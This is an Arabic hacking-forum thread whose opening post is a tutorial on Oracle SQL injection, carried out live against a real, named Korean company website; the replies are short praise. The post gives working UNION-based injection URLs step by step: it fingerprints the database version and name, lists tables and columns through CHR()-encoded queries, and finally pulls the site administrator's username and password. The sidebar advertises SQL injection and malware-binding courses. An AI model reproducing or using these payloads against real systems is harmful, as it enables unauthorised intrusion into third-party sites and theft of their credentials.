1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

الموضوع في '[ SQL-injection ]' بواسطة Hiker, بتاريخ ‏3 يوليو 2014.

كاتب الموضوع : Hiker المشاهدات : 580 الردود : 8 ‏3 يوليو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Hiker <span style="font-weight: bold; text-shadow: #BBBB
    rank
    V • I • P

    عضو منذ:
    ‏2 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاتة

    اليوم سنتكلم عن حقن قواعد البيانات الــــ ORACLE

    ان شاء الله

    واقوم بتوضيح الاستعلامات التي نخاطب بها هذا النوع من القواعد ان شاء الله
    وتخطي حيل المبرمجين ونقوم بجلب البيانات المستخرجة حتى وان كانت مخفيه
    وسحاول ابسط الفكره لحقن مثل هذا النوع ان شاء الله نبدأ
    مع العلم هي شبية بحقن قواعد البيانات MySql
    مما يعني طرق التخاطب لا في استعلام الأوامر
    راح انطبق الدرس على هالموقع التالي
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=PHILEO-914UV
    وبالطريقة الروتينية
    وبوضع سنكل كويتث '
    في نهاية الرابط
    [​IMG]
    كما نلاحظ فالصورة من خلال الخطأ الضاهر لدينا تبين ان لنا نوع القاعده هي ORACLE

    طيب نحدد عدد الأعمده بالاستعلام المعروف
    order by
    امر استعلام واضح
    وبالطريقة التقليديه يعني نضل نقلل ليما يختفي الخطأ عندها حددنا عدد الاعمده
    بعد ما حددنا عدد الاعمدة وهي 4

    هنا نقوم بتحديد العمود المصاب عن طريق الاستعلام
    union select
    هنا ما راح نكتب عدد الاعمده بقيمه رقميه راح نعوض عن كل عمود بقيمه فارغه اي نصيه
    اي
    1 = null
    وهكذا
    يعني الاستعلام يكون بهذا الشكل
    كود PHP:
    union select null,null,null,null 
    مع الحاق نهايه الحقنه بالأمر الآتي
    كود PHP:
    from%20v$version من اصدار القاعدة هنا ارفقنا هذا الامر لنتعرف على الاعمده المصابه لستكمال استغلالنا
    لنحصل على ما نريد من معلومات
    طيب الاستعلام يصبح بهذا الشكل
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20NULL,NULL,NULL,NULL%20from%20v$version+--+
    لو تلاحظ في الصفحى تبع الموقع ماظهرت اي معلومات او عمود مصاب
    طيب في طريقه لأظهار الاعمده بالصفحة نشوف كيفية استخراج الأعمد المصابة
    بستبدال القيمه null بــــــــ '1'
    يعني مكان اول قيمه فارغه نستبدلها بــــــــ '1'
    يعني كل قيمه فارغه نستبدلة برقم و وضع كل رقم مابين علامتي تنصيص
    يعني مكان اول قيمه فارغه نستبدله اذا مشت الحقنه وما ضهر خطأ في الصفحه اذن العمود مصاب واذا ضهر خطأ يعني العمود ليس مصاب انخلي قيمه فارغه
    هذه الطريقه استخدمنها لتحديد الاعمده المصابه
    هنا ماشاء الله الاعمده كله مصابه يعني الحقنه راح اتكون على النحو التالي
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%273%27,%274%27%20from%20v$version+--+
    لو نلاحظ في صفحة الموقع لم تظهر اي بيانات
    طيب هنا صاحب السكربت مخبئ المعلومات في سورس الصور
    طيب كلك يمين على اي صوره بالصفحه ونذهب كما موضح بالصورة
    [​IMG]
    ستضهر لنا مصدر الصور كما في الصورة
    [​IMG]
    كما نلاحظ الاعمده المصابه هنا مخبأه

    الآن لنتعرف على اصدار القاعدة
    نفس الاستعلام السابق ولكن نضع مكان العمود المصابه الامر
    كود PHP:
    BANNER =  هنا استخدمناه لكي تضهر لنا اصدار القاعده يعني كبصمه لاستخراج  المعلومات في مكان العمود المصاب وهذه خاصة في قواعد الاوراكل
    لاحظ الحقنه
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,BANNER,%274%27%20from%20v$version+--+
    [​IMG]
    كما نلاحظ الاصدار واضح بالصورة CORE11.1.0.6.0Production

    الآن نستخرج اسم القاعدة عن طريق وضع

    لتصبح الحقنة
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,SYS.DATABASE_NAME,%274%27%20from%20DUAL+--+
    [​IMG]
    كما موضح فالصورة اسم القاعدة HIMSDB

    الآن ننتقل الى اضهار الجداول والحقول معاَ
    عن طريق الاستعلام التالي

    لتصبح الحقنة بهذا الشكل
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from%20USER_TAB_COLUMNS+--+
    [​IMG]
    كما نلاحظ في الصورة ضهور اول جدول و أول عمود من قاعدة البيانات

    الآن التنقل الى الجداول البقيه من خلال

    أول جدول ضهر لنا هو AS_FLTR_EXCH_HISY
    بعد ما قمنا بتحويله يصبح
    كود PHP:
    CHR(65) || CHR(83) || CHR(95) || CHR(70) || CHR(76) || CHR(84) ||  CHR(82) || CHR(95) || CHR(69) || CHR(88) || CHR(67) || CHR(72) ||  CHR(95) || CHR(72) || CHR(73) || CHR(83) || CHR(89)
    مع الحاق الحقنة بالامر
    كود PHP:
    Where table_name> = اينما تجد الجدول الفلاني اجلبلي الي بعده او الاكبر منه و هكذا
    لتصبح الحقنه بشكل التالي
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from%20USER_TAB_COLUMNS%20where%20table_name%3E%20%20CHR%2865%29%20||%20CHR%2883%29%20||%20CHR%2895%29%20||%20CHR%2870%29%20||%20CHR%2876%29%20||%20CHR%2884%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2869%29%20||%20CHR%2888%29%20||%20CHR%2867%29%20||%20CHR%2872%29%20||%20CHR%2895%29%20||%20CHR%2872%29%20||%20CHR%2873%29%20||%20CHR%2883%29%20||%20CHR%2889%29+--+
    [​IMG]
    كما نلاحظ الجدول الثاني والعمود الأول لجدول الثاني

    لأستخراج الجداول البقية كما اسردنا سابقاَ
    الآن نختصر الطريقه باستخراج جدول اليوزر لاحظ الحقنة
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_name%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29+--+
    [​IMG]
    كما موضح جدول اليوزر مع ضهور اول عمود لجدول اليوزر
    PL_USER = جدول اليوزر
    ADDR_1 = العمود الآول لجدول اليوزر

    الآن نريد التنقل بين الاعمدة لجدول اليوزر
    نضيف الامر التالي بعد الجدول المشفر بقيمة chr
    and column_name> = اجلبلي العمود الي بعدة
    بنفس الكلام الي فوق نحول اسم العمود الى قيمة chr العمود الاول الي استخرجنا من جدول اليوزر هو ADDR_1
    كود PHP:

    CHR
    (65) || CHR(68) || CHR(68) || CHR(82) || CHR(95) || CHR(49)  =  اسم العمود بعد التشفير
    لتصبح الحقنة
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_name%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_name%3E%20%20CHR%2865%29%20||%20CHR%2868%29%20||%20CHR%2868%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2849%29+--+
    شوف السورس ضهر ثاني عمود
    نختصر على السريع انا استخرجت عمود اليوزر والباسورد لجدول اليوزر
    لاحظ الحقنه
    هذه لليوزر
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_name%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_name%3E%20%20%20CHR%2885%29%20||%20CHR%2883%29%20||%20CHR%2869%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2876%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2869%29%20||%20CHR%2876%29+--+
    وهذه للباسورد
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_name%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_name%3E%20%20%20CHR%2885%29%20||%20CHR%2883%29%20||%20CHR%2869%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2878%29%20||%20CHR%2879%29+--+
    كما نلاحظ في الصوره
    [​IMG]
    الآن استخراج بيانات الأعمدة لعمود اليوزر والبسورد من جدول اليوزر
    لاحظ الحقنة بشكل النهائي
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28USER_NAME||chr%2858%29||USER_PWD%29,%274%27%20from+PL_USER+--+
    كما نلاحظ في الصورة اليوزر والباسورد للادمن
    [​IMG]
    الى هنا ارجو اني قد وفقت في ايصال المعلومة واسف اذا اخطأت في شي
    واعذروني على الاطالة واي استفسار انا حاضر
    في امان الله
     


    2 شخص معجب بهذا.
    جاري تحميل الصفحة...
  2. غير متصل

    HaMaM-HaCkEr
    DeveloPer Plus

    عضو منذ:
    ‏22 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    ماشاء الله عليك موضوع في القمه

    ماذا تعتقد في مشاركة Hiker؟ يعجبني ويستحق التقييم​
     


  3. غير متصل

    Hiker <span style="font-weight: bold; text-shadow: #BBBB
    rank
    V • I • P

    عضو منذ:
    ‏2 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    تسلم اخوي ومنور اي استفسار موجود
    #ٌnًo.
     


  4. غير متصل

    m0j4hed
    rankrank
    Developer

    عضو منذ:
    ‏20 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    ي خي مشاءلله عليك مواضيعك جباره دائماً و تحب تتميز عن غيرك ​
     


  5. غير متصل

    ADNAN
    Developer

    عضو منذ:
    ‏29 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    استاذنا بارك الله فيك
    والله يعطيك العافيه
     


  6. غير متصل

    أمير عرش الدموع
    DeveloPer Plus

    عضو منذ:
    ‏25 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    وعليكم السلام ورحمة الله وبركاته

    يعطيك العافية حبيبي !:"
     


  7. غير متصل

    Abo MalaK
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    يعطيك العافية يا مبدع
     


  8. غير متصل

    ( xP )
    DeveloPer Plus

    عضو منذ:
    ‏10 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    مشكور اخى الكريم على المجهود الرائع
    رمضان كريم وتقبل الله منا ومنكم
     


  9. غير متصل

    zezo the king
    rank
    Developer

    عضو منذ:
    ‏23 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    مشكور يابطل :{y.}
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...